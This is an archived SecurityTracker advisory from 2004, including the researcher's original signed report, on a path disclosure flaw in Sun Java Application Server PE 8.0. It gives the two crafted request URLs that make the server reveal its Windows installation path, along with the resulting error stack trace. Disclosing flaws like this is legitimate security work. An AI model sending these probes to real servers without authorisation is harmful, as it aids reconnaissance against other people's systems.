SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Sun Java Application Server (Sun ONE) Vendors:   Sun
Sun Java Application Server Discloses Installation Path to Remote Users
SecurityTracker Alert ID:  1010321
SecurityTracker URL:  http://securitytracker.com/id/1010321
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Aug 25 2004
Original Entry Date:  May 27 2004
Impact:   Disclosure of system information
Exploit Included:  Yes  
Version(s): PE 8.0
Description:   An information disclosure vulnerability was reported in the Sun Java Application Server. A remote user can determine the installation path.

Marc Schoenefeld reported that a remote user can submit the following type of requests to the target system to cause the system to disclose the installation path:

http://[target]:8080////
http://[target]:8080////CON

Impact:   A remote user can determine the installation path.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.sun.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Red Hat Enterprise), Linux (Red Hat Linux), Linux (Sun), UNIX (Solaris - SunOS), Windows (2000), Windows (XP)
Underlying OS Comments:  Tested on Microsoft Windows

Message History:   None.


 Source Message Contents

Subject:  Sun-Java-App-Server PE 8.0 path disclosure


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

when doing the following requests consequently against a Sun-Java-App-Server
PE 8.0 a Windows Box

http://127.0.0.1:8080////
http://127.0.0.1:8080////CON

you get a HTTP 500 Error, which reveals the installation path and the fact
that the server  is running on a WinDos box (see details below) ....

Cheers
Marc

:

HTTP Status 500 -

type Exception report

message

description The server encountered an internal error () that prevented it
from fulfilling this request.

exception

java.io.FileNotFoundException:
C:\Programme\Sun\AppServer\domains\domain1\docroot\CON (Zugriff verweigert)
   java.io.FileInputStream.open(Native
Method)
   java.io.FileInputStream.(FileInputStream.java:106)

org.apache.naming.resources.FileDirContext$FileResource.streamContent(FileDirContext.java:1060)

org.apache.catalina.servlets.DefaultServlet$ResourceInfo.getStream(DefaultServlet.java:2504)

org.apache.catalina.servlets.DefaultServlet.copy(DefaultServlet.java:1938)

org.apache.catalina.servlets.DefaultServlet.serveResource(DefaultServlet.java:1057)

org.apache.catalina.servlets.DefaultServlet.doGet(DefaultServlet.java:518)
   javax.servlet.http.HttpServlet.service(HttpServlet.java:748)
   javax.servlet.http.HttpServlet.service(HttpServlet.java:861)
   sun.reflect.GeneratedMethodAccessor67.invoke(Unknown
Source)

sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
   java.lang.reflect.Method.invoke(Method.java:324)
   org.apache.catalina.security.SecurityUtil$1.run(SecurityUtil.java:289)
   java.security.AccessController.doPrivileged(Native
Method)
   javax.security.auth.Subject.doAsPrivileged(Subject.java:500)
   org.apache.catalina.security.SecurityUtil.execute(SecurityUtil.java:311)

org.apache.catalina.security.SecurityUtil.doAsPrivilege(SecurityUtil.java:205)

note The full stack trace of the root cause is available in the
Sun-Java-System/Application-Server-PE-8.0 logs.
Sun-Java-System/Application-Server-PE-8.0



- --

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (AIX)

iD8DBQFAtTIPqCaQvrKNUNQRAptIAJ0YV+gpcM3yyffoLKe5l2eLcESytwCfdggj
drtNJzHEUkeMF/v+o2VaDw4=
=/RwK
-----END PGP SIGNATURE-----

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC